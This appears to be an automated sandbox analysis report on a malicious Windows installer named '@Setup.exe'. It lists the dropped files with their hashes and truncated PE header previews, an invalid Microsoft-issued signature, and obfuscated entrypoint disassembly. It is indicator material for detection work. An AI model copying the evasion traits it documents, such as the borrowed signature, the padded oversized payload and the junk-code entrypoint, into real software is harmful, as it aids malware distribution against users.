                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\@Setup.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):12191445
                                                                                                                                                                                            Entropy (8bit):7.975937528091654
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:196608:3x6Xhm3naEJp1N1x7JpGTRQTrwlZJdO6T+nAIy986TeaZcSSFDi/:3x6Xw3RJbdVpGmT8ldkn+8sZcSj
                                                                                                                                                                                            MD5:34B63F16F994365A2FC9263E87CD28E8
                                                                                                                                                                                            SHA1:3C64CAD2F1D93BF4D67EAAD58E3C80390F760589
                                                                                                                                                                                            SHA-256:36E2B9BAA6A42E568DA06872089A66ACFB533B14DCF52568D061F51A606BD59F
                                                                                                                                                                                            SHA-512:E48DE084739ADF52CA8DE549AB0D19F462DC017C80CE1EFD72A1994D924218CD99B87D641832B171F50CAB3DDA5508FFF017F0E2FBD78E7D62E3CD70C16FC54F
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@...................................Y...@......@...................p..q....P.......................... Z...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hwk025u.j0y.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjfgeatj.bvx.psm1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hufzt4b4.nog.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3bcgshd.eau.ps1

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                            Entropy (8bit):6.53001282597034
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                            MD5:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                                                                            SHA1:67DB71F5A885B1E417B1272218E6B814C45A6C93
                                                                                                                                                                                            SHA-256:E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
                                                                                                                                                                                            SHA-512:AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                            • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                            • Filename: GLD6WIS3RXG4KKYJLK.exe, Detection: malicious, Browse
                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-3URAC.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-3URAC.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp
                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3367424
                                                                                                                                                                                            Entropy (8bit):6.53001282597034
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                            MD5:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                                                                            SHA1:67DB71F5A885B1E417B1272218E6B814C45A6C93
                                                                                                                                                                                            SHA-256:E25EF8AA3AB40EE6950DACC4CCD9EDD1EBE973D45109F6EEF34F7F49E26A2E27
                                                                                                                                                                                            SHA-512:AE560D59071F8E2D484E5607E6A3C6CAC52F011A6CB3F16B5EECB767F555D10A480AF32FE0BEB0DC6FF4B6BEC99B536AEBA58AD6697DAB72AAF60BD46F3BFC83
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-RPL3R.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-RPL3R.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp
                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\UltraMedia\is-C1AV0.tmp

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1063239551
                                                                                                                                                                                            Entropy (8bit):0.19795435725041813
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                            MD5:C12ED31F29EF510393AE36661F44F102
                                                                                                                                                                                            SHA1:2F00EEEA897AD851E65FE3A877D9B6380AEE484D
                                                                                                                                                                                            SHA-256:8467A252F34645C19D8CDE87BBC4E214E81C58BB8D0376C67A43086222508CA0
                                                                                                                                                                                            SHA-512:2075F2B500D65D8187470BA66EDFB268CE165F4841921F04629449CC62ED40D2D02FAE29CF0CA7C4DC7DDA925EA69E30C11E96042108B83899FF6150DBFC5CBD
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................N.........$.N.......N...@..........................P............@......@........................... Q..@....T..`............_?.)....Q.,N............................Q.....................................................CODE......N.......N................. ..`DATA..........N.......N.............@...BSS...........P......hP..................idata...@... Q..B...hP.............@....tls....0....pQ.......P..................rdata........Q.......P.............@..P.reloc.. N....Q..P....P.............@..P.rsrc....`....T..b....S.............@..P..............t.......s.............@..P........................................................................................................................................

                                                                                                                                                                                            C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe (copy)

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1063239551
                                                                                                                                                                                            Entropy (8bit):0.19795435725041813
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                            MD5:C12ED31F29EF510393AE36661F44F102
                                                                                                                                                                                            SHA1:2F00EEEA897AD851E65FE3A877D9B6380AEE484D
                                                                                                                                                                                            SHA-256:8467A252F34645C19D8CDE87BBC4E214E81C58BB8D0376C67A43086222508CA0
                                                                                                                                                                                            SHA-512:2075F2B500D65D8187470BA66EDFB268CE165F4841921F04629449CC62ED40D2D02FAE29CF0CA7C4DC7DDA925EA69E30C11E96042108B83899FF6150DBFC5CBD
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................N.........$.N.......N...@..........................P............@......@........................... Q..@....T..`............_?.)....Q.,N............................Q.....................................................CODE......N.......N................. ..`DATA..........N.......N.............@...BSS...........P......hP..................idata...@... Q..B...hP.............@....tls....0....pQ.......P..................rdata........Q.......P.............@..P.reloc.. N....Q..P....P.............@..P.rsrc....`....T..b....S.............@..P..............t.......s.............@..P........................................................................................................................................

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Entropy (8bit):0.47150527049723495
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:@Setup.exe
                                                                                                                                                                                            File size:74'057'612 bytes
                                                                                                                                                                                            MD5:fc4450b75ae409fe64d363e515b0aa5e
                                                                                                                                                                                            SHA1:5a89134156e826a4db8781398f6743721f2869a6
                                                                                                                                                                                            SHA256:3b4cc799a42605fb1d9cfca03eed962dc8aa735618250668de7d93bec186b5e4
                                                                                                                                                                                            SHA512:9a48efbc9bd40ae3fd3164f33187af4c83dfb73009e4d2e665cbdc7d10147cbd1696d2a82e8f8d0c40d758e09848fdfdd0937e4ea9212b0de7b1428364eb76a0
                                                                                                                                                                                            SSDEEP:49152:zWwOB3i+ShBAK/cHlqqGbGRD+s2XDhywwwwwwwwww9wwwwwwwwwwwROH:Ayr/cEbGRyBXDK
                                                                                                                                                                                            TLSH:98F7482D560022E0DF47D5AA8903E7E5A92A8403631237DF517EE24B96037FF437F96A
                                                                                                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:5571316969cc8e49

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x401000
                                                                                                                                                                                            Entrypoint Section:
                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x64DCDE8B [Wed Aug 16 14:34:51 2023 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:ca83edce3be51bbe8a5e34264d8cf2b2

                                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                            Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                            • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                            • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                            Version:3
                                                                                                                                                                                            Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                                                                            Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                                                                            Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                                                                            Serial:33000003DFFB6AE3F427ECB6A30000000003DF

                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                            Instruction
                                                                                                                                                                                            push 0068C001h
                                                                                                                                                                                            call 00007FE874B30256h
                                                                                                                                                                                            ret
                                                                                                                                                                                            shl eax, 09h
                                                                                                                                                                                            call 00007FE874B69D99h
                                                                                                                                                                                            and edi, ebx
                                                                                                                                                                                            and ebx, F95F8ED7h
                                                                                                                                                                                            sub ebx, C1637927h
                                                                                                                                                                                            cmp dword ptr [0046CF88h], eax
                                                                                                                                                                                            jne 00007FE874B30254h
                                                                                                                                                                                            neg ecx
                                                                                                                                                                                            cmp dword ptr [00474F2Fh], esp
                                                                                                                                                                                            jne 00007FE874B30258h
                                                                                                                                                                                            xor edx, 3068F4F2h
                                                                                                                                                                                            sub ebx, eax
                                                                                                                                                                                            or eax, F156FDCCh
                                                                                                                                                                                            dec ecx
                                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                                            or ebx, dword ptr [004653A7h]
                                                                                                                                                                                            add edx, 8A5F55D3h
                                                                                                                                                                                            call 00007FE874B743D3h
                                                                                                                                                                                            not edx
                                                                                                                                                                                            add esi, esi
                                                                                                                                                                                            shl ebx, 03h
                                                                                                                                                                                            sub edx, esi
                                                                                                                                                                                            or edx, ebx
                                                                                                                                                                                            or eax, dword ptr [004147B9h]
                                                                                                                                                                                            cmp ebx, E55D8B34h
                                                                                                                                                                                            jnle 00007FE874B30258h
                                                                                                                                                                                            and ebx, 77C225D9h
                                                                                                                                                                                            mov ecx, 52F7C4D6h
                                                                                                                                                                                            xchg edi, eax
                                                                                                                                                                                            cmp edi, ebp
                                                                                                                                                                                            jns 00007FE874B30254h
                                                                                                                                                                                            not edx
                                                                                                                                                                                            ror edx, 1Eh
                                                                                                                                                                                            add edx, esp
                                                                                                                                                                                            sub eax, esp
                                                                                                                                                                                            cmp ebx, esp
                                                                                                                                                                                            je 00007FE874B30258h
                                                                                                                                                                                            add edi, dword ptr [0046B85Ah]
                                                                                                                                                                                            mov edi, A78D0BB8h
                                                                                                                                                                                            add esi, dword ptr [0045ACFBh]
                                                                                                                                                                                            rol edi, 13h
                                                                                                                                                                                            shl ebx, 0Fh
                                                                                                                                                                                            and edi, esi
                                                                                                                                                                                            not esi
                                                                                                                                                                                            dec ecx
                                                                                                                                                                                            jne 00007FE874B30220h
                                                                                                                                                                                            neg edx
                                                                                                                                                                                            or edx, B16BF60Eh
                                                                                                                                                                                            mov ecx, 6CED84F0h
                                                                                                                                                                                            xor esi, 9753F2F9h
                                                                                                                                                                                            mov edx, D380077Ah
                                                                                                                                                                                            xchg edx, eax
                                                                                                                                                                                            sub ebx, dword ptr [000000C8h]

                                                                                                                                                                                            Data Directories

                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x23a0000x104
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x28ca900x354.data
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x26d0000x1ee00.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x469e5bc0x21d0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x28ce380x10.data
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x28ca240x18.data
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x100000

                                                                                                                                                                                            Sections

                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
